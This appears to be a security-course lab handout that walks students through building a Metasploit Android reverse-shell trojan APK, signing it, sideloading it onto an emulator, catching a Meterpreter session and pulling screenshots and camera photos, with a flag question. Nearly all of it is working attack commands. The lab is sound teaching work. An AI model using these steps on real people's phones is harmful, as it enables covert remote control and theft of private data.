M 410: Exploiting an Android Phone with Metasploit (15 pts extra)

What You Need for This Project

Android Studio
Android Debug Bridge running the host system
A Debian Linux machine
You should have that already set up from previous projects

Purpose

To use Metasploit to add Trojan code to an Android app. This is too easy :)

Preparation

In Android Studio, create an emulator with these settings:

Name: Pixel 4 XL
API 30, Android 11.0

Setup

These instructions assume you have a setup as shown below, with a Windows or MacOS host system and Debian Linux and Android guest systems.

If you are using a Debian virtual machine, adjust it to use Bridged networking.

Testing the Networking

On your Debian Linux machine, execute this command:

ip a

Find your Debian machine's IP address, highlighted in the upper right window in the image below.

Open a Terminal on your host system and execute these commmands, replacing the IP address with the correct IP address of your Debian machine:

adb shell ping 172.20.10.3

You should see replies, as shown in the lower right window in the image below, indicating that your Android emulator can contact your Debian machine.

If you do not see replies, you must troubleshoot your networking before continuing with this project.

Press Ctrl+C to stop the pings.

Installing Required Software

On Linux, execute these commands:

sudo apt update sudo apt install apktool curl wget gnupg2 android-tools-adb default-jdk

Accept any default install options.

Then execute these commands:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod +x msfinstall ./msfinstall

Creating a Malicious App

On Linux, execute this command to see the Android payloads available in Metasploit.

msfvenom -l payloads | grep android

There are only a few payloads available, as shown below.

On Linux, execute this command to find your IP address.

ip a

When I did it, the address was 172.16.123.130, as shown below.

On Linux, execute this command to generate the malware, replacing the IP address with your Linux systems IP address:

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.123.130 -f raw -o happyfunball.apk

The malware is generated, as shown below.

Making a Code Signing Certificate

Android won't run unsigned apps, so we need a signing certificate.

Execute this command:

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

A prompt asks for a "keystore password". Enter password twice.

Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.

Signing the Malicious APK

Execute this command:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore happyfunball.apk alias_name

When you are prompted to, enter the key store password of password

The app is signed, as shown below.

Installing the Malware

On your Linux machine, execute this command:

python3 -m http.server 8080

This starts a Web server listening on port 8080, serving files from your current working directory.

On your Android phone, open a Web browser and go to this URL, replacing the IP address with the correct IP address of your Linux machine:

http://172.17.71.147:8080/happyfunball.apk

Install the app on your phone. You will have to approve the installation in a few different ways, as prompted on your phone.

Starting a C&C Server

On Linux, in a Terminal, execute these commands, one at a time, to start a listener:

msfconsole -q use multi/handler set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 exploit

Metasploit begins listening on port 4444, as shown below.

Launching the Malicious App on the Phone

On your host system, execute this command.

The monkey program simulates a user launching the app by tapping the interface on the phone.

adb shell monkey -p com.metasploit.stage -c android.intent.category.LAUNCHER 1

On your phone, a page appears asking for permissions, as shown below. Click Continue. Click OK.

In your other Terminal window, a meterpreter shell opens, as shown below.

Flag M 410.1: Meterpreter Version (15 pts)
In the meterpreter shell, execute this command:
sysinfo
The flag is the Meterpreter version, covered by a green rectangle in the image below.

Looting the Phone

Try these Meterpreter commands:

getuid -- See who you are
screenshot -- See the Android screen
download /storage/emulated/0/DCIM/Camera -- Steal photos off the phone
help -- See more commands to try

Updated for new setup 10-31-22
default-jdk install added 4-24-24
Network test section and video added 4-25-24
Updated, specifying the old version of Android to use 10-29-25